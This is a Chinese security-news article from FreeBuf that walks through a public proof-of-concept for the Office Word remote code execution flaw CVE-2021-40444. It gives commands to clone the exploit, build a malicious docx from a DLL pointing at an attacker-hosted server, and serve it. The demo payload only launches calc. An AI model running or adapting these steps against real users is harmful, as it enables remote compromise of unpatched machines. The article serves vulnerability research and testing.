freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

漏洞利用:如何利用Office Word远程代码执行漏洞CVE-2021-40444
2021-09-28 19:47:35

技术介绍

在本文中,我们将给大家提供一个针对微软Office Word远程代码执行漏洞CVE-2021-40444的PoC。这个PoC中,我们会使用一个恶意docx生成器,并成功利用CVE-2021-40444,即微软Office Word远程代码执行漏洞。

这个PoC脚本主要基于研究人员针对在野样本的逆向工程分析结果而创建,参考的docx文件样本为:

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52

漏洞利用前提

首先,我们需要安装好lcab:

sudo apt-get install lcab

如果生成的cab无法使用的话,请尝试将exploit.html URL指向calc.cab。

漏洞利用

首先,我们需要使用下列命令将漏洞利用PoC代码包下载至本地:

git clone https://github.com/lockedbyte/CVE-2021-40444.git

接下来,我们需要根据给定的DLL生成一份恶意docx文档,此时可以使用PoC项目目录中的“test/calc.dll”文件,该DLL将会通过调用system()来执行calc.exe:

python3 exploit.py generate test/calc.dll http://<SRV IP>

拿到了生成好的恶意docx文档(存储在out/目录中)之后,我们就可以配置并启动服务器了:

sudo python3 exploit.py host 80

最后,我们可以在一台Windows虚拟机中测试PoC和生成的恶意docx文档:

PoC项目库

PoC:GitHub传送门

本文作者:, 转载请注明来自FreeBuf.COM

# 漏洞利用 # 远程代码执行漏洞 # Office Word漏洞
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑